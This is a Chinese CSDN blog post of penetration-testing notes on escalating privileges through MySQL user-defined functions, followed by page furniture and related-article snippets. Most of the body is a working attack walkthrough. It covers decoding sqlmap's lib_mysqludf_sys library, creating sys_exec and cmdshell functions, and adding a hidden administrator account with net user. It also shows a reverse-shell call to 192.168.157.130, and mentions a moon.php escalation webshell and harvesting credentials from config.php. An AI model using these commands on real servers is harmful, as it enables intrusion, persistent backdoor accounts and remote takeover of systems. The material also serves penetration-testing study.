【渗透测试】MySQL的udf提权笔记

最新推荐文章于 2024-06-08 15:51:52 发布
最新推荐文章于 2024-06-08 15:51:52 发布
阅读量1.1k 收藏 5
点赞数 2
分类专栏: 渗透测试 文章标签: 数据库 mysql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42742658/article/details/119880476
版权

目录

【渗透测试】MySQL的udf提权笔记

Mysql_udf提权
1、UDF提权原理

正是由于MySQL支持UDF,支持我们自定义函数来扩展功能。当我们创建带有调用cmd函数的’udf.dll’(动态链接库)。当我们把’udf.dll’导出指定文件夹引入Mysql时,其中的调用函数拿出来当作mysql的函数使用。这样我们自定义的函数才被当作本机函数执行。

2、udf.dll导出指定文件夹

当 MySQL< 5.1 版本时,将 .dll 文件导入到 c:\windows 或者 c:\windows\system32 目录下。
当 MySQL> 5.1 版本时,将 .dll 文件导入到 MySQL Server 5.xx\lib\plugin 目录下 (lib\plugin目录默认不存在,需自行创建)。

3、plugin目录创建方式

通过菜刀连接创建
通过mysql语句创建

4、提权条件

(1)mysql数据库的root权限
(2)secure_file_priv的值为空
(3)如果mysql版本大于5.1,udf.dll文件必须放置在mysql安装目录的lib\plugin文件夹下/
(4)如果mysql版本小于5.1, udf.dll文件在windows server 2003下放置于c:\windows\system32目录,在windows server 2000下放置在c:\winnt\system32目录。

show variables like 'plugin%';   【查看 plugin 目录】
show global variables like 'secure%'; 【查看secure_file_priv】
select @@basedir; 【查看mysql安装路径】
show variables like '%version_%'; 【确定平台是64位还是32位】

在这里插入图片描述在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述

5、复现(暗月的使用)

1)使用moon.php提权马操作完成
www/data/config.php内一般会有数据库的用户名和密码
在这里插入图片描述在这里插入图片描述在这里插入图片描述

目标机器上已经出现udf.dll
在这里插入图片描述

可以执行系统命令了
在这里插入图片描述

2)根据mysql版本自己手动将udf.dll文件写入到对应的目录下
Windows/linux获取udf文件:使用sqlmap生成
(1)Windows下进入sqlmap安装目录下的extra\cloak目录下使用cloak.py工具

python cloak.py -d -i C:\sqlmap\data\udf\mysql\windows\64\lib_mysqludf_sys.dll_

sqlmap的data目录下udf的加密文件,使用上述命令解密一下即可获得udf.dll。
在这里插入图片描述

(2)Kali下获取udf文件
将Kali系统中sqlmap自带的udf提权库文件进行解码。 在Kali攻击机上,启动终端,依次输入如下命令:

cd /usr/share/sqlmap/extra/cloak/ 【进入cloak目录】
python cloak.py -d -i /usr/share/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so_
【将lib_mysqludf_sys.so_进行解码】

之后在/usr/share/sqlmap/udf/mysql/linux/64
目录下会生成一个名为“lib_mysqludf_sys.so”的解码后的so文件
将dll文件复制到指定的目录下,然后执行SQL命令:

create function sys_exec returns string soname "lib_mysqludf_sys.dll";

然后即可用自己创建的函数执行系统命令
select sys_eval(‘whoami’);
函数介绍:

sys_eval,执行任意命令,并将输出返回。
sys_exec,执行任意命令,并将退出码返回。
sys_get,获取一个环境变量。
sys_set,创建或修改一个环境变量。
一般用于创建新用户维持权限

create function cmdshell returns string soname 'moonudf.dll' 【创建cmdshell】
select cmdshell('net user $darkmoon 123456 /add & net localgroup administrators $darkmoon /add')   【添加超级管理员】
select cmdshell('net user')  【查看用户】
select cmdshell('netstat -an')  【查看端口】
select name from mysql.func   【查看创建函数】
delete from mysql.func where name='cmdshell'  【删除cmdshell】
create function backshell returns string soname 'moonudf.dll' 【创建反弹函数】
select backshell('192.168.157.130',12345)    【执行反弹】
delete from mysql.func where name='backshell'  【删除backshell】

久违 2021.8.18
好久没有更新了,我回来了。

久违 °
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
通过mysql root账户get shell_渗透学习笔记--场景篇--通过mysql的root账号来get shell...
weixin_30229479的博客
02-11 499
场景介绍: 今天的场景是前一周在内网渗透的时候遇到过的,找到一个mysql数据库弱口令。 账号和密码分别是root,也就是mysql中的dba。 这里其实权限很大了,首先mysql的root用户具有文件写权限,同时mysql5.0以上,提供一个system函数,而这个函数通常被攻击者用作shell的接口。 那时在遇到这个弱口令时,我就在想怎样快速的拿下这台主...
【学习笔记】-提权篇(保姆级)
rm -rf *
01-30 532
内网渗透(详细、初级)、提权手段归纳
PHPMySQL 渗透笔记
Coisini的博客
05-25 232
渗透PHP+MYSQL站点 TitanRain.Security.Team 教程仅用于群内成...
MySQL提权UDF提权
最新发布
2301_76227305的博客
06-08 1345
udf 全称为'user defined function',意思是'用户自定义函数'。用户可以对数据库所使用的函数进行一个扩展(windows利用dll文件,linux利用so文件),那么我们就可以利用这个特点,往MySQL里面添加一个可以执行系统命令的函数即可。udf提权本质就是通过添加自定义函数让MySQL能执行系统命令,仅此而已。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
中北网安实训笔记-(20200623)-MYSQL渗透测试课程)mysql详解、命令操作介绍
tonyhapply的博客
07-09 347
下期安排: burp suite修改包中数据或者当做代理使用 A:access数据(Windows)SQL server(微软) B: Oracle(甲骨文)大型数据库 MySQL 社区-》商业付费 C: Mariadb 社区多人维护(免费)Kali Linux A、B、C: 关系型数据库 作用:解决我们应用系统内的复杂关系(内存中部分存储) D: redis mongdb 非关系型数据库(内存中存储,读取速度快,突然断电可以备份数据,比较适合大数据) MySQL之父 Michael Widenius 1
渗透学习笔记
莫黎小天
11-06 2401
一、SQL注入漏洞 SQL注入:web程序对用户输入数据的合法性没有判断,前端传入后端的参数可控的,并且参数带入数据库查询,攻击者可通过构造SQL语句来实现对数据库的任意操作。 1.sql注入原理 满足条件: ​ 参数用户可控:前端传入后端的内容用户可以控制 ​ 参数带入数据库查询:传入的参数拼接到SQL语句,且带入数据库查询。 原因:用户输入的数据被SQL解释器执行 2.注入漏洞分类 1)数字型注入 当输入的参数为整型时,如:ID、年龄、页码,若存在注入漏洞,则可认为是数字型 测试:
mysql udf提权
weixin_44304678的博客
03-25 359
上传成功后,执行如下命令创建自定义函数。
系统提权之:Unix 提权
f_carey的博客
08-28 919
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 系统提权之:Unix 提权1 Unix 内核漏洞提权1.1 利用前提1.2 利用 NC 建立 Shell 会话(便于操作)1.2.1 本地配置 NC 监听1.2.2 上传 perl-reverse-shell.pl 反弹 Shell1.3 查询 Unitx 系统内核信息1.4 查找内核版本对应的提权 EXP1..
系统提权之:Windows 提权
f_carey的博客
11-04 2739
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Windows 提权1 利用漏洞提权1.1 手工查找系统缺失补丁1.2 Windows 补丁审计工具1.2.1 Windows-Exploit-Suggester1.2.2 Sherlock1.3 MSF 模块查找可利用漏洞2 利用 Windows 配置错误提权2.1 系统服务权限配置错误2.1.1 利用 Po.
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5513
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
渗透测试信息收集之域名信息、子域名信息、IP信息、端口信息
yjwangan的博客
11-24 2350
域名(Domain Name),简称域名、网域,是由一串用点分隔的名字组成的Internet上某一台计算机或计算机组的名称,用于在数据传输时标识计算机的电子方位(有时也指地理位置)DNS(域名系统,Domain Name System)是互联网的一项服务它作为将域名和IP地址相互映射的一个分布式数据库,能够使人更方便地访问互联网顶尖域名二级域名三级域名.combaidu.com政府域名商业域名教育域名.gov.com.edu子域名指二级域名,二级域名是顶级域名(一级域名)的下一级。
MySQL数据库渗透及漏洞利用总结
02-25
Mysql数据库是目前世界上使用最为广泛的数据库之一,很多著名公司和站点都使用Mysql作为其数据库支撑,目前很多架构都以Mysql作为数据库管理系统,例如LAMP、和WAMP等,在针对网站渗透中,很多都是跟Mysql数据库有关,各种Mysql注入,Mysql提权Mysql数据库root账号webshell获取等的,但没有一个对Mysql数据库渗透较为全面对总结,针对这种情况我们开展了研究,虽然我们团队今年正在出版《网络攻防实战研究——漏洞利用与提权》,但技术的进步有无止境,思想有多远,路就可以走多远,在研究mysql数据库安全之余,对Mysql如何通过msf、sqlmap等来进行扫描、漏洞
渗透测试数据库UDF提权(linux)
qq_63442530的博客
04-01 1925
UDF:User Defined Function 用户自定义函数,MySQL数据库的初衷是用于方便用户进行自定义函数,方便查询一些复杂的数据,同时也有可能被攻击者利用,使用udf进行提权提权原理:攻击者通过编写,能调用cmd或者shell的共享库文件(window为.dll,linux为.so),并且导入到一个指定的文件夹目录下,在数据库中通过导入的共享库文件创建自定义函数,该自定义函数功能依照于共享库文件的功能,从而在数据库中调用该自定义函数能够使用系统命令。
Mysql_udf提权[超详细]|VulnHub-Raven:2渗透测试
qq_60115503的博客
04-22 2917
Mysql内置函数 Mysql有很多内置函数提供给使用者,包括字符串函数,数值函数,日期和时间函数等,给开发人员和使用者带来了很多方便 UDF介绍 Mysql的内置函数虽热丰富,但毕竟不能满足所有人的需求,有时候我们需要对表中的数据进行一些处理而内置函数不能满足需要的时候,就需要对Mysql进行一些扩展,幸运的是,Mysql给使用者提供了添加新函数的机制,这种使用者自行添加的Mysql函数就称为UDF(User Define Function)UDF机制能够起作用,必须...
mysql udf提权原理_udf提权原理详解
weixin_32512261的博客
01-19 621
0x00-前言这个udf提权复现搞了三天,终于搞出来了。网上的教程对于初学者不太友好,以至于我一直迷迷糊糊的,走了不少弯路。下面就来总结一下我的理解。想要知道udf提权是怎么回事,首先要先知道udf是什么。环境:本机os: win10靶机os: win7php: 5.4.45mysql: 5.50x01-udf是什么?udf = 'user defined function',即‘用户自定义函数’...
udf提权
weixin_30576859的博客
03-16 649
0x00前言: udf提权是通过数据库来实现获取目标的管理员的shell,来达到从低权限提权到高权限 0x01什么是udfudf(Userdefined function)是用户自定义函数 在mysql中函数是什么,比如mysql中常见的sleep(),sum(),ascii()等都是函数 udf就是为了让我们开发者能够自己写方便自己函数,它有3种返回值,这三种分别是STRIN...
UDF提权
秋水的博客
10-03 781
0x00 简介 看到了一些文章,有MySQLudf提权,也有MSSQL的udf提权,这里以MySQL为例 udf是什么? udf = "user defined function",即用户自定义函数 是通过添加新函数,对MYSQL的功能进行扩充,性质就象使用本地MYSQL函数如abs()或concat() 如果mysql版本小于5.1, udf.dll文件在windows ser...
MySQL udf提权
weixin_45945976的博客
12-02 956
MySQL udf提权 UDF提权这个利用还是不太常见的,因为在mysql5.1版本以后对注册的UDF的位置有了限制,而在默认的是没有\lib\plugin文件夹的,一般需要root用户修改。 什么是UDF UDF就是User Defined Function,用户自定义函数,即通过用户添加的函数来对MySQL的功能进行补偿 怎么使用UDF 我的mysql版本:5.7.26,所以我的是默认没有plugin这个目录的 查看secure_file_priv的指 secure_file_priv是用来限制load
mysql udf 提权
03-06
MySQL UDF(User-Defined Function)是MySQL中的用户自定义函数,它允许用户通过编写自己的函数来扩展MySQL的功能。UDF可以用于实现各种自定义功能,包括提权提权是指通过某种方式获取更高权限的操作。在MySQL中,如果你拥有一个低权限的账户,但是想要执行高权限操作,可以通过UDF提权来实现。 具体来说,你可以编写一个UDF函数,该函数可以执行一些需要高权限才能执行的操作,比如修改系统文件、执行系统命令等。然后将该UDF函数加载到MySQL中,并使用低权限账户调用该函数,从而实现提权操作。 需要注意的是,UDF提权需要满足以下条件: 1. 你需要有CREATE FUNCTION权限,以创建和加载UDF函数。 2. 你需要找到一个合适的提权方法,并编写相应的UDF函数。 3. 你需要知道目标MySQL服务器的版本和配置,以确保你选择的提权方法适用于该版本和配置。 请注意,提权是一种潜在的安全风险行为,应该谨慎使用,并且仅在合法授权的情况下进行。滥用提权功能可能导致系统被攻击或数据泄露等安全问题。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

久违 °

小菜鸟就要使劲飞

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值